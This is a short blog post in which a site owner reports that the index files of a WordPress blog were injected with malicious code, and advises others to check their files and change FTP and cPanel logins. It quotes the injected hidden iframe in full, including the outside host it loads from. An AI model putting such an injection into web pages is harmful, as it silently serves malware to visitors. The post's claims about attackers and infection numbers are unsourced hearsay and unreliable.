I just read a very interesting article, that you want to read...
Though it has nothing to do with the recent iframe hack, because it effected every style of site, not just wordpress blogs, the article has a lot of good points, and you want to read it...
Trust me? Read it. here is the link: http://wordpress.org/development/2009/09/keep-wordpress-secure/
At 7 pm tonight my students emailed me that our blog was down.
I checked immediately for an attack, and found that all the index.php and index.html files were altered an 18:46 EST, and a line of code was added either after the starting body tag or at the very end of the code
<iframe src="http://a6t.homeftp.net:8080/ts/in.cgi?open" width=230 height=0 style="visibility: hidden"></iframe>
do not go there...
I googled the topic and found that some Russian hackers have created keylogger sites and the keylogger scripts get all your passwords.
If it is an individual site: your password was compromised.
I have sites on other servers, like this site, and none of those were attacked. I think it is Hostgator that is compromised... so if you have a site on hostgator, please check your index files... and clean them.
I hear in Italy tens of thousands of computers are infected... as a result of the iframe hack that effects every site, but especially wordpress blogs.
This time the database isn't attacked, only the files. It seems that they get to the sites with ftp... if you can, please change your ftp and cpanel login. I am planning on removing my sites from hostgator.com